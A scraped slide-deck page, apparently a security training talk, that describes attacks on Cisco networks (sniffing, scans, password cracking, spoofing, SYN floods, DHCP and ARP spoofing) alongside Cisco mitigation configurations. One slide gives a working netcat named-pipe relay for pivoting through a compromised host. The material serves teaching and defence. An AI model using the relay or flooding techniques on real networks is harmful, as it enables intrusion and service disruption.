SlideShare a Scribd company logo

Hacking Cisco Networks and Countermeasures

D
dkaya
1 of 59
Download to read offline
Hacking Cisco Networks and Countermeasures
Overview • Reconnaissance Attacks – Passive Sniffing – Ping Sweeps – Port Scans (tcp&udp) • Active Attacks – Password attacks – Trust exploitation – Port redirection • External Attacks – IP Spoofing – DoS, DDoS Attacks • Internal Attacks – DHCP and ARP Attacks
Reconnaissance Attacks • Reconnaissance refers to the overall act of learning information about a target network by using readily available information and applications. • Reconnaissance attacks include these attacks: – Packet sniffers – Port scans – Ping sweeps – Internet information queries
Packet Sniffers • A packet sniffer is a software application that uses a network adapter card in promiscuous mode to capture all network packets. There are packet sniffer features: – Packet sniffers exploit information passed in clear text. Protocols that pass information in clear text are Telnet, FTP, SNMP, Post Office Protocol (POP), and HTTP. – Packet sniffers must be on the same collision domain as the machine that they are targeting. – Packet sniffers can be used legitimately or can be designed specifically for attack. Host A Host B Router A Router B
Passive Sniffing
Packet Sniffer Attack Mitigation • Here are some packet sniffer mitigation techniques and tools: – Authentication – Switched infrastructure – Antisniffer tools – Cryptography Host A Host B Router A Router B
Port Scans and Ping Sweeps • Port scan and ping sweep attacks: – Identify all services on the network – Identify all hosts and devices on the network – Identify the operating systems on the network – Identify vulnerabilities on the network
Ping Sweep with NMAP
Ping Sweep (cont.)
Blocking Ping Sweeps access-list 102 deny icmp any any echo access-list 102 permit ip any any interface FastEthernet0/0 ip address 10.1.1.254 255.255.255.0 ip access-group 102 in
Seems like it worked but ???
We give out too much information…
To block messages originating from the blocking router… access-list 103 permit icmp any any unreachable class-map match-all STOPSHARING match access-group 103! policy-map STOPSHARING class STOPSHARING drop class class-default control-plane service-policy output STOPSHARING
Same result…
But this time we don’t share info…
Simple UDP Port Scan
Destination Unreachable (Port)
How to block… access-list 101 deny icmp any any unreachable access-list 101 permit ip any any interface FastEthernet0/0 ip address 10.1.1.254 255.255.255.0 ip access-group 101 out
We don’t send any unreachable messages…
After Blocking everything seems open, some obscurity for scanner…
• Port scans and ping sweeps cannot be prevented without compromising network capabilities. Port Scan and Ping Sweep Attack Mitigation However, damage can be mitigated using IPS at the network and host levels. Workstation with HIPS Laptop with HIPS Scan Port Shared Connection IDS and IPS
Internet Information Queries • Sample IP address query Attackers can use Internet tools such as whois as a weapon.
Access Attacks • Intruders use access attacks on networks or systems for the these reasons: – Retrieve data – Gain access – Escalate their access privileges • Access attacks include: – Password attacks – Trust exploitation – Port redirection
Password Attacks • Hackers implement password attacks using: – Brute-force attacks – Trojan horse programs – IP spoofing – Packet sniffers
Password Attack Example – The bgp_md5crack tool is used for cracking a secret used for RFC2385 based packet signing and authentication. It is designed for offline cracking, means to work on a sniffed, correct signed packet. This packet can either be directly sniffed of the wire or be provided in a pcap file.
For Routing Protocols…
Simple Cracking with Cain…
Trust Exploitation – A hacker leverages existing trust relationships. – Several trust models exist: • Microsoft Windows: – Domains – Active directory • Linux and UNIX: – NIS – NIS+ System A User = psmith; Pat Smith System B is compromised by a hacker. User = psmith; Pat Smith Hacker User = psmith; Pat Smithson A hacker gains access to System A . Trust relationships: • System A trusts System B. • System B trusts everyone. • System A trusts everyone.
Port Redirection Host B Attacker Source: A Destination: B Port: 23 Compromised Host A Source: Attacker Destination: A Port: 22 Source: Attacker Destination: B Port: 23
Port Redirection Configuration On HOSTA we create a named pipe using the mkfifo commands: #pipe will be the name of our named pipe mkfifo pipe We then create our two way tunnel using Netcat on HOSTA: nc -lvp 25 <pipe | nc -t 10.1.2.253 23 >pipe Then telnet from Attacker machine telnet 10.1.2.1 80
Here we are connected to the internal switch…
IP Spoofing – IP spoofing occurs when a hacker inside or outside a network impersonates a trusted source. – IP spoofing uses trusted internal IP addresses or trusted external IP addresses. – Attackers use IP spoofing for many reasons: • To gain root access • To inject malicious data or commands into an existing data stream • To divert network packets to the hacker who can then reply as a trusted user by changing the routing tables • To crash servers by overloading memory (DoS) • As a step in a larger attack
IP Spoofing—Types of Attack •IP spoofing attacks are either: – Nonblind spoofing • The attacker sniffs sequence numbers (i.e., from inside the subnet of the victim). – Blind spoofing • The attacker calculates sequence numbers. •IP spoofing can lead to these types of attacks: – Man-in-the-middle attack – DoS attack – Distributed DoS (DDoS) attack
Let’s see in action
Here we drive router to reply to the other host..
Man-in-the-Middle Attacks – A man-in-the-middle attack requires that the hacker has access to network packets that come across a network. – A man-in-the-middle attack is implemented using the following: • Network packet sniffers (nonblind attack) • Routing and transport protocols (blind attack) Host A Host B Router A Router B Data in Clear Text
IP Spoofing Attack Mitigation • The threat of IP spoofing can be reduced, but not eliminated, using these measures: – Strong access control at the router • ACLs on outbound interface • ACLs on inbound interface – Data encryption – Additional authentication requirements Host A Host B Router A ISP Router B IPSec tunnel
DoS Attacks • A DoS attack damages or corrupts your computer system or denies you and others access to your networks, systems, or services. • DoS attack techniques almost always use IP spoofing.
TCP SYN Flooding DoS Attack Attacker TCP Client ------------- Client Ports 1024–65535 Victim TCP Server ------------- Service Ports 1–1024 80 1SYN 2 SYN and ACK ? SYN Packet with Spoofed Source Address TCP Client ------------- Client Ports 1024–65535 TCP Server ------------- Service Ports 1–1024 80 1SYN 3ACK 2 SYN and ACK TCP Three- Way Handshake
DDoS Attacks • DoS and DDoS attacks have these characteristics: – They are not generally targeted to gain access. – They aim at making a service unavailable. – They require very little effort to execute. – They are difficult to eliminate. • DoS Attack • DDoS Attack Attacker Victim Attack Control Mechanism Zombie Zombie Zombie Victim
DDoS Example Handler Systems Client System 4. The client issues commands to handlers that control agents in a mass attack. 1. The cracker looks for targets. 2. The cracker installs software to scan, compromise, and infect agents with zombies. 3. Agents are loaded with remote control attack software. Agent Systems
SYN Flooding Attack
Let’s be more creative…
We put almost 1 million packets in one minute period on the wire, not so bad….
CPU Consumption..
DoS and DDoS Attack Mitigation • Reduce DoS and DDoS attacks by: – Protecting yourself against IP spoofing with ingress- and egress-filtering ACLs – Using antivirus software to find zombie agents – Using anti-DoS features on routers and firewalls • ip verify unicast reverse-path interface command • ACLs to filter all private Internet address space (RFC 1918) – Using traffic rate limiting at the ISP level • Use class-based traffic policing on ICMP packets • Use SYN rate limiting
Rate Limiting What rate limiting does: • Allows network managers to set bandwidth thresholds for users and by traffic type Benefits: • Prevents the deliberate or accidental flooding of the network • Keeps traffic flowing smoothly Rate Limiting for Different Classes of UsersNetwork Manager Teachers Students 2 Mbps 10 Mbps 50 Mbps Otherwise, there can be a deliberate or accidental slowdown or freezing of the network.
Example: ICMP rate limiting access-list 170 permit icmp any any Interface f0/0 rate-limit input access-group 170 128000 16000 24000 conform-action transmit exceed-action drop
Spoofing the DHCP Server 1. An attacker activates a DHCP server on a network segment. 2. The client broadcasts a request for DHCP configuration information. 3. The rogue DHCP server responds before the legitimate DHCP server can respond, assigning attacker-defined IP configuration information. 4. Host packets are redirected to the attacker address as it emulates a default gateway for the erroneous DHCP address provided to the client. ClientRogue DHCP Attacker Legitimate DHCP Server
Everything starts with starvation…
Storm Control can be in help… Interface fastethernet 0/1 storm-control broadcast level 10.00 8.00
DHCP Snooping – DHCP snooping allows the configuration of ports as trusted or untrusted. • Trusted ports can send DHCP requests and acknowledgements. • Untrusted ports can forward only DHCP requests. – DHCP snooping enables the switch to build a DHCP binding table that maps a client MAC address, IP address, VLAN, and port ID. – Use the ip dhcp snooping command. Client Rogue DHCP Attacker Legitimate DHCP Server
DHCP Snooping Configuration ip dhcp snooping ip dhcp snooping vlan 20 interface FastEthernet0/13 switchport access vlan 20 ip dhcp snooping trust Switch#sh ip dhcp snooping binnding MacAddress IpAddress Lease(sec) Type VLAN Interface ------------------ --------------- ---------- ------------- ---- -------------------- 00:14:A8:96:2C:40 10.1.2.12 86371 dhcp-snooping 20 FastEthernet0/24 00:14:6A:1D:B8:00 10.1.2.13 86371 dhcp-snooping 20 FastEthernet0/23 Total number of bindings: 2
ARP Spoofing: Man-in-the-Middle Attacks •10.1.1.1 = MAC C.C.C.C ARP Table in Host A IP 10.1.1.2 MAC A.A.A.A A B •10.1.1.2 = MAC C.C.C.C ARP Table in Host B •10.1.1.1 = MAC B.B.B.B •10.1.1.2 = MAC A.A.A.A ARP Table in Host C CIP 10.1.1.3 MAC C.C.C.C 1. IP 10.1.1.2 ? MAC for 10.1.1.1 2. Legitimate ARP reply 10.1.1.1 = MAC B.B.B.B 3. Subsequent gratuitous ARP replies overwrite legitimate replies •10.1.1.1 bound to C.C.C.C •10.1.1.2 bound to C.C.C.C Attacker IP 10.1.1.1 MAC B.B.B.B A B C A = host A B = host B C = host C
10.1.1.1 Mitigating Man-in-the-Middle Attacks with DAI • MAC or IP Tracking Built on DHCP Snooping 10.1.1.2 DHCP Server DHCP Discovery (BCAST) DHCP Offer (UCAST) DAI provides protection against attacks such as ARP poisoning using spoofing tools such as ettercap, dsniff, and arpspoof. DAI Function: Track Discovery Track DHCP Offer MAC or IP Track Subsequent ARPs for MAC or IP
DAI in Action •A binding table containing IP-address and MAC-address associations is dynamically populated using DHCP snooping. 10.1.1.1 10.1.1.2 10.1.1.2 GARP is sent to attempt to change the IP address to MAC bindings. Gateway is 10.1.1.1 Attacker is not gateway according to this binding table I am your gateway: 10.1.1.1
DAI Configuration… ip arp inspection vlan 20 ip arp inspection vlan 20 logging dhcp-bindings all ip arp inspection validate src-mac
Questions & Discussion ? ?? ? ? ? ?? ? ? ? ? ? ?
Thank you…

Recommended

Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in DepthDilum Bandara
 
DoS or DDoS attack
DoS or DDoS attackDoS or DDoS attack
DoS or DDoS attackstollen_fusion
 
Firewall Basing
Firewall BasingFirewall Basing
Firewall BasingPina Parmar
 
Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security FundamentalsRahmat Suhatman
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Fabiha Shahzad
 
Intrusion detection
Intrusion detectionIntrusion detection
Intrusion detectionCAS
 
Ch 11: Hacking Wireless Networks
Ch 11: Hacking Wireless NetworksCh 11: Hacking Wireless Networks
Ch 11: Hacking Wireless NetworksSam Bowne
 
Security Threats at OSI layers
Security Threats at OSI layersSecurity Threats at OSI layers
Security Threats at OSI layersDepartment of Computer Science
 

Recommended

Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in DepthDilum Bandara
 
DoS or DDoS attack
DoS or DDoS attackDoS or DDoS attack
DoS or DDoS attackstollen_fusion
 
Firewall Basing
Firewall BasingFirewall Basing
Firewall BasingPina Parmar
 
Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security FundamentalsRahmat Suhatman
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Fabiha Shahzad
 
Intrusion detection
Intrusion detectionIntrusion detection
Intrusion detectionCAS
 
Ch 11: Hacking Wireless Networks
Ch 11: Hacking Wireless NetworksCh 11: Hacking Wireless Networks
Ch 11: Hacking Wireless NetworksSam Bowne
 
Security Threats at OSI layers
Security Threats at OSI layersSecurity Threats at OSI layers
Security Threats at OSI layersDepartment of Computer Science
 
Denial of service
Denial of serviceDenial of service
Denial of servicegarishma bhatia
 
Dos attack
Dos attackDos attack
Dos attackManjushree Mashal
 
Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08DallasHaselhorst
 
Network Security
Network SecurityNetwork Security
Network SecurityMAJU
 
Network security
Network securityNetwork security
Network securityEstiak Khan
 
Access Control Presentation
Access Control PresentationAccess Control Presentation
Access Control PresentationWajahat Rajab
 
Security threats
Security threatsSecurity threats
Security threatsQamar Farooq
 
Secure by Design - Security Design Principles for the Rest of Us
Secure by Design - Security Design Principles for the Rest of UsSecure by Design - Security Design Principles for the Rest of Us
Secure by Design - Security Design Principles for the Rest of UsEoin Woods
 
Malicious software and software security
Malicious software and software securityMalicious software and software security
Malicious software and software securityG Prachi
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?btpsec
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS AttacksJignesh Patel
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attackAhmed Ghazey
 
Session Hijacking ppt
Session Hijacking pptSession Hijacking ppt
Session Hijacking pptHarsh Kevadia
 
Firewalls
FirewallsFirewalls
FirewallsRam Dutt Shukla
 
Intrusion Detection And Prevention
Intrusion Detection And PreventionIntrusion Detection And Prevention
Intrusion Detection And PreventionNicholas Davis
 
Modern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeModern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeIkhtiar Khan Sohan
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Gaurav Sharma
 
Cybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamCybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamMohammed Adam
 
Operating system security
Operating system securityOperating system security
Operating system securityRamesh Ogania
 
Intrusion Discovery on Windows
Intrusion Discovery on WindowsIntrusion Discovery on Windows
Intrusion Discovery on Windowsdkaya
 
Sniffing SSL Traffic
Sniffing SSL TrafficSniffing SSL Traffic
Sniffing SSL Trafficdkaya
 

More Related Content

What's hot

Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08DallasHaselhorst
 
Network Security
Network SecurityNetwork Security
Network SecurityMAJU
 
Network security
Network securityNetwork security
Network securityEstiak Khan
 
Access Control Presentation
Access Control PresentationAccess Control Presentation
Access Control PresentationWajahat Rajab
 
Secure by Design - Security Design Principles for the Rest of Us
Secure by Design - Security Design Principles for the Rest of UsSecure by Design - Security Design Principles for the Rest of Us
Secure by Design - Security Design Principles for the Rest of UsEoin Woods
 
Malicious software and software security
Malicious software and software securityMalicious software and software security
Malicious software and software securityG Prachi
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?btpsec
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attackAhmed Ghazey
 
Session Hijacking ppt
Session Hijacking pptSession Hijacking ppt
Session Hijacking pptHarsh Kevadia
 
Intrusion Detection And Prevention
Intrusion Detection And PreventionIntrusion Detection And Prevention
Intrusion Detection And PreventionNicholas Davis
 
Modern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeModern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeIkhtiar Khan Sohan
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Gaurav Sharma
 
Cybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamCybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamMohammed Adam
 
Operating system security
Operating system securityOperating system security
Operating system securityRamesh Ogania
 

What's hot (20)

Denial of service
Denial of serviceDenial of service
Denial of service
 
Dos attack
Dos attackDos attack
Dos attack
 
Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08Cybersecurity Awareness Training Presentation v2021.08
Cybersecurity Awareness Training Presentation v2021.08
 
Network Security
Network SecurityNetwork Security
Network Security
 
Network security
Network securityNetwork security
Network security
 
Access Control Presentation
Access Control PresentationAccess Control Presentation
Access Control Presentation
 
Security threats
Security threatsSecurity threats
Security threats
 
Secure by Design - Security Design Principles for the Rest of Us
Secure by Design - Security Design Principles for the Rest of UsSecure by Design - Security Design Principles for the Rest of Us
Secure by Design - Security Design Principles for the Rest of Us
 
Malicious software and software security
Malicious software and software securityMalicious software and software security
Malicious software and software security
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attack
 
Session Hijacking ppt
Session Hijacking pptSession Hijacking ppt
Session Hijacking ppt
 
Firewalls
FirewallsFirewalls
Firewalls
 
Intrusion Detection And Prevention
Intrusion Detection And PreventionIntrusion Detection And Prevention
Intrusion Detection And Prevention
 
Modern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeModern Network Security Issue and Challenge
Modern Network Security Issue and Challenge
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)
 
Cybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by AdamCybersecurity Awareness Session by Adam
Cybersecurity Awareness Session by Adam
 
Operating system security
Operating system securityOperating system security
Operating system security
 

Viewers also liked

Intrusion Discovery on Windows
Intrusion Discovery on WindowsIntrusion Discovery on Windows
Intrusion Discovery on Windowsdkaya
 
Sniffing SSL Traffic
Sniffing SSL TrafficSniffing SSL Traffic
Sniffing SSL Trafficdkaya
 
Mitigating Layer2 Attacks
Mitigating Layer2 AttacksMitigating Layer2 Attacks
Mitigating Layer2 Attacksdkaya
 
Cisco Switch Security
Cisco Switch SecurityCisco Switch Security
Cisco Switch Securitydkaya
 
Module 1 introduction to Linux
Module 1 introduction to LinuxModule 1 introduction to Linux
Module 1 introduction to LinuxTushar B Kute
 
Mitigating worm attacks
Mitigating worm attacksMitigating worm attacks
Mitigating worm attacksdkaya
 
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.Sumutiu Marius
 
Mastering checkpoint-1-basic-installation
Mastering checkpoint-1-basic-installationMastering checkpoint-1-basic-installation
Mastering checkpoint-1-basic-installationnetworkershome
 
Microsoft Days 09 Windows 2008 Security
Microsoft Days 09 Windows 2008 SecurityMicrosoft Days 09 Windows 2008 Security
Microsoft Days 09 Windows 2008 Securitydkaya
 
Understanding and Troubleshooting ASA NAT
Understanding and Troubleshooting ASA NATUnderstanding and Troubleshooting ASA NAT
Understanding and Troubleshooting ASA NATCisco Russia
 
Implementing Cisco AAA
Implementing Cisco AAAImplementing Cisco AAA
Implementing Cisco AAAdkaya
 
Web Security Deployment
Web Security DeploymentWeb Security Deployment
Web Security DeploymentCisco Canada
 
Avaya Networking Solution Overview
Avaya Networking Solution OverviewAvaya Networking Solution Overview
Avaya Networking Solution OverviewMotty Ben Atia
 
Implementing 802.1x Authentication
Implementing 802.1x AuthenticationImplementing 802.1x Authentication
Implementing 802.1x Authenticationdkaya
 
Check point presentation june 2014
Check point presentation june 2014Check point presentation june 2014
Check point presentation june 2014David Berkelmans
 
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...Cisco Russia
 
Cisco ASA Firepower
Cisco ASA FirepowerCisco ASA Firepower
Cisco ASA FirepowerAnwesh Dixit
 

Viewers also liked (20)

Intrusion Discovery on Windows
Intrusion Discovery on WindowsIntrusion Discovery on Windows
Intrusion Discovery on Windows
 
Sniffing SSL Traffic
Sniffing SSL TrafficSniffing SSL Traffic
Sniffing SSL Traffic
 
Mitigating Layer2 Attacks
Mitigating Layer2 AttacksMitigating Layer2 Attacks
Mitigating Layer2 Attacks
 
Cisco Switch Security
Cisco Switch SecurityCisco Switch Security
Cisco Switch Security
 
Attacks
AttacksAttacks
Attacks
 
Module 1 introduction to Linux
Module 1 introduction to LinuxModule 1 introduction to Linux
Module 1 introduction to Linux
 
Presentation1
Presentation1Presentation1
Presentation1
 
Mitigating worm attacks
Mitigating worm attacksMitigating worm attacks
Mitigating worm attacks
 
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
 
Mastering checkpoint-1-basic-installation
Mastering checkpoint-1-basic-installationMastering checkpoint-1-basic-installation
Mastering checkpoint-1-basic-installation
 
Microsoft Days 09 Windows 2008 Security
Microsoft Days 09 Windows 2008 SecurityMicrosoft Days 09 Windows 2008 Security
Microsoft Days 09 Windows 2008 Security
 
Understanding and Troubleshooting ASA NAT
Understanding and Troubleshooting ASA NATUnderstanding and Troubleshooting ASA NAT
Understanding and Troubleshooting ASA NAT
 
Implementing Cisco AAA
Implementing Cisco AAAImplementing Cisco AAA
Implementing Cisco AAA
 
Web Security Deployment
Web Security DeploymentWeb Security Deployment
Web Security Deployment
 
Avaya Networking Solution Overview
Avaya Networking Solution OverviewAvaya Networking Solution Overview
Avaya Networking Solution Overview
 
Implementing 802.1x Authentication
Implementing 802.1x AuthenticationImplementing 802.1x Authentication
Implementing 802.1x Authentication
 
Checkpoint r77
Checkpoint r77Checkpoint r77
Checkpoint r77
 
Check point presentation june 2014
Check point presentation june 2014Check point presentation june 2014
Check point presentation june 2014
 
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
 
Cisco ASA Firepower
Cisco ASA FirepowerCisco ASA Firepower
Cisco ASA Firepower
 

Similar to Hacking Cisco Networks and Countermeasures

lecture5.pptx
lecture5.pptxlecture5.pptx
lecture5.pptxLlobarro2
 
Lecture 7 Attacker and there tools.pptx
Lecture 7 Attacker and there tools.pptxLecture 7 Attacker and there tools.pptx
Lecture 7 Attacker and there tools.pptxAsmaaLafi1
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITYVinil Patel
 
DDOS Mitigation Experience from IP ServerOne by CL Lee
DDOS Mitigation Experience from IP ServerOne by CL LeeDDOS Mitigation Experience from IP ServerOne by CL Lee
DDOS Mitigation Experience from IP ServerOne by CL LeeMyNOG
 
Vulnerabilities in IP Protocols
Vulnerabilities in IP ProtocolsVulnerabilities in IP Protocols
Vulnerabilities in IP Protocolsbabak danyal
 
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths640-554 IT Certification and Career Paths
640-554 IT Certification and Career Pathshibaehed
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.pptjepoy808
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.pptanakorang28
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.pptsumita02
 
Attacks and their mitigations
Attacks and their mitigationsAttacks and their mitigations
Attacks and their mitigationsMukesh Chaudhari
 
Defcon 16-pilosov-kapela
Defcon 16-pilosov-kapelaDefcon 16-pilosov-kapela
Defcon 16-pilosov-kapelaHai Nguyen
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptcemporku
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdftehkotak4
 

Similar to Hacking Cisco Networks and Countermeasures (20)

Hacking Cisco
Hacking CiscoHacking Cisco
Hacking Cisco
 
vulnerabilities in IP.pdf
vulnerabilities in IP.pdfvulnerabilities in IP.pdf
vulnerabilities in IP.pdf
 
lecture5.pptx
lecture5.pptxlecture5.pptx
lecture5.pptx
 
Lecture 7 Attacker and there tools.pptx
Lecture 7 Attacker and there tools.pptxLecture 7 Attacker and there tools.pptx
Lecture 7 Attacker and there tools.pptx
 
26 security2
26 security226 security2
26 security2
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITY
 
DDOS Mitigation Experience from IP ServerOne by CL Lee
DDOS Mitigation Experience from IP ServerOne by CL LeeDDOS Mitigation Experience from IP ServerOne by CL Lee
DDOS Mitigation Experience from IP ServerOne by CL Lee
 
Vulnerabilities in IP Protocols
Vulnerabilities in IP ProtocolsVulnerabilities in IP Protocols
Vulnerabilities in IP Protocols
 
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.ppt
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.ppt
 
26-security2.ppt
26-security2.ppt26-security2.ppt
26-security2.ppt
 
Attacks and their mitigations
Attacks and their mitigationsAttacks and their mitigations
Attacks and their mitigations
 
Defcon 16-pilosov-kapela
Defcon 16-pilosov-kapelaDefcon 16-pilosov-kapela
Defcon 16-pilosov-kapela
 
Network security
Network securityNetwork security
Network security
 
Security attacks
Security attacksSecurity attacks
Security attacks
 
Isys20261 lecture 07
Isys20261 lecture 07Isys20261 lecture 07
Isys20261 lecture 07
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.ppt
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdf
 
Attack.pptx
Attack.pptxAttack.pptx
Attack.pptx
 

Hacking Cisco Networks and Countermeasures

  • 1. Hacking Cisco Networks and Countermeasures
  • 2. Overview • Reconnaissance Attacks – Passive Sniffing – Ping Sweeps – Port Scans (tcp&udp) • Active Attacks – Password attacks – Trust exploitation – Port redirection • External Attacks – IP Spoofing – DoS, DDoS Attacks • Internal Attacks – DHCP and ARP Attacks
  • 3. Reconnaissance Attacks • Reconnaissance refers to the overall act of learning information about a target network by using readily available information and applications. • Reconnaissance attacks include these attacks: – Packet sniffers – Port scans – Ping sweeps – Internet information queries
  • 4. Packet Sniffers • A packet sniffer is a software application that uses a network adapter card in promiscuous mode to capture all network packets. There are packet sniffer features: – Packet sniffers exploit information passed in clear text. Protocols that pass information in clear text are Telnet, FTP, SNMP, Post Office Protocol (POP), and HTTP. – Packet sniffers must be on the same collision domain as the machine that they are targeting. – Packet sniffers can be used legitimately or can be designed specifically for attack. Host A Host B Router A Router B
  • 6. Packet Sniffer Attack Mitigation • Here are some packet sniffer mitigation techniques and tools: – Authentication – Switched infrastructure – Antisniffer tools – Cryptography Host A Host B Router A Router B
  • 7. Port Scans and Ping Sweeps • Port scan and ping sweep attacks: – Identify all services on the network – Identify all hosts and devices on the network – Identify the operating systems on the network – Identify vulnerabilities on the network
  • 10. Blocking Ping Sweeps access-list 102 deny icmp any any echo access-list 102 permit ip any any interface FastEthernet0/0 ip address 10.1.1.254 255.255.255.0 ip access-group 102 in
  • 11. Seems like it worked but ???
  • 12. We give out too much information…
  • 13. To block messages originating from the blocking router… access-list 103 permit icmp any any unreachable class-map match-all STOPSHARING match access-group 103! policy-map STOPSHARING class STOPSHARING drop class class-default control-plane service-policy output STOPSHARING
  • 15. But this time we don’t share info…
  • 18. How to block… access-list 101 deny icmp any any unreachable access-list 101 permit ip any any interface FastEthernet0/0 ip address 10.1.1.254 255.255.255.0 ip access-group 101 out
  • 19. We don’t send any unreachable messages…
  • 20. After Blocking everything seems open, some obscurity for scanner…
  • 21. • Port scans and ping sweeps cannot be prevented without compromising network capabilities. Port Scan and Ping Sweep Attack Mitigation However, damage can be mitigated using IPS at the network and host levels. Workstation with HIPS Laptop with HIPS Scan Port Shared Connection IDS and IPS
  • 22. Internet Information Queries • Sample IP address query Attackers can use Internet tools such as whois as a weapon.
  • 23. Access Attacks • Intruders use access attacks on networks or systems for the these reasons: – Retrieve data – Gain access – Escalate their access privileges • Access attacks include: – Password attacks – Trust exploitation – Port redirection
  • 24. Password Attacks • Hackers implement password attacks using: – Brute-force attacks – Trojan horse programs – IP spoofing – Packet sniffers
  • 25. Password Attack Example – The bgp_md5crack tool is used for cracking a secret used for RFC2385 based packet signing and authentication. It is designed for offline cracking, means to work on a sniffed, correct signed packet. This packet can either be directly sniffed of the wire or be provided in a pcap file.
  • 28. Trust Exploitation – A hacker leverages existing trust relationships. – Several trust models exist: • Microsoft Windows: – Domains – Active directory • Linux and UNIX: – NIS – NIS+ System A User = psmith; Pat Smith System B is compromised by a hacker. User = psmith; Pat Smith Hacker User = psmith; Pat Smithson A hacker gains access to System A . Trust relationships: • System A trusts System B. • System B trusts everyone. • System A trusts everyone.
  • 29. Port Redirection Host B Attacker Source: A Destination: B Port: 23 Compromised Host A Source: Attacker Destination: A Port: 22 Source: Attacker Destination: B Port: 23
  • 30. Port Redirection Configuration On HOSTA we create a named pipe using the mkfifo commands: #pipe will be the name of our named pipe mkfifo pipe We then create our two way tunnel using Netcat on HOSTA: nc -lvp 25 <pipe | nc -t 10.1.2.253 23 >pipe Then telnet from Attacker machine telnet 10.1.2.1 80
  • 31. Here we are connected to the internal switch…
